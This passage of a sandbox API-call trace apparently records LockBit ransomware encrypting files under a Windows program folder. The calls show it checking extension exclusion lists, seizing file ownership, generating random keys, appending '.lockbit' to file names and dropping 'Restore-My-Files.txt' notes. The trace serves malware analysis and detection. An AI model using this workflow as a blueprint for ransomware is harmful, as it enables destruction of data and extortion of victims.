maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.022] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb0da69, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb0da69, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_photo_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.022] lstrcmpiW (lpString1=".", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.022] lstrcmpiW (lpString1="..", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.022] PathFindExtensionW (pszPath="rectangle_photo_Thumbnail.bmp") returned=".bmp" [0086.022] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.022] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.022] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.022] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.023] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.023] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.023] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.023] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.023] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_photo_Thumbnail.bmp") returned 1 [0086.024] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.024] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.024] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.024] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.024] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_photo_Thumbnail.bmp") returned 1 [0086.024] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0086.024] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.024] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned=".bmp" [0086.024] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.024] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.024] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.025] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.025] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.lockbit") returned 82 [0086.025] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.027] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.027] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.027] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.027] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.027] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.027] RtlFreeAnsiString (AnsiString="\\") [0086.027] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.027] malloc (_Size=0x200) returned 0x77d800 [0086.027] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.027] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.027] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.028] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.028] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.028] CloseHandle (hObject=0x3bc) returned 1 [0086.028] free (_Block=0x77d800) [0086.029] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.029] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.029] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.029] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.030] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.036] malloc (_Size=0xba) returned 0x1ff1e60 [0086.036] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0086.036] free (_Block=0x1ff1e60) [0086.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.036] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.037] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.037] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea754f5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea754f5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_plain_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.037] lstrcmpiW (lpString1=".", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.037] lstrcmpiW (lpString1="..", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.037] PathFindExtensionW (pszPath="rectangle_plain_Thumbnail.bmp") returned=".bmp" [0086.037] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0086.037] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0086.037] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0086.037] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0086.037] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0086.038] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.038] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.038] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_plain_Thumbnail.bmp") returned 1 [0086.038] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.038] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.038] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_plain_Thumbnail.bmp") returned 1 [0086.038] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0086.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned=".bmp" [0086.039] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.039] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.039] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.040] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.040] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.lockbit") returned 82 [0086.040] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.040] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.041] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.041] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.041] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.041] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.041] RtlFreeAnsiString (AnsiString="\\") [0086.041] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.041] malloc (_Size=0x200) returned 0x77d800 [0086.041] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.041] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.041] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.041] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.042] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.042] CloseHandle (hObject=0x3bc) returned 1 [0086.042] free (_Block=0x77d800) [0086.042] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.042] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.042] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.042] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.044] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.052] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.052] malloc (_Size=0xba) returned 0x1ff1e60 [0086.052] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0086.052] free (_Block=0x1ff1e60) [0086.052] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.053] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.053] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.053] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb33bc6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb33bc6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_postage_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0086.053] lstrcmpiW (lpString1=".", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.053] lstrcmpiW (lpString1="..", lpString2="rectangle_postage_Thumbnail.bmp") returned -1 [0086.053] PathFindExtensionW 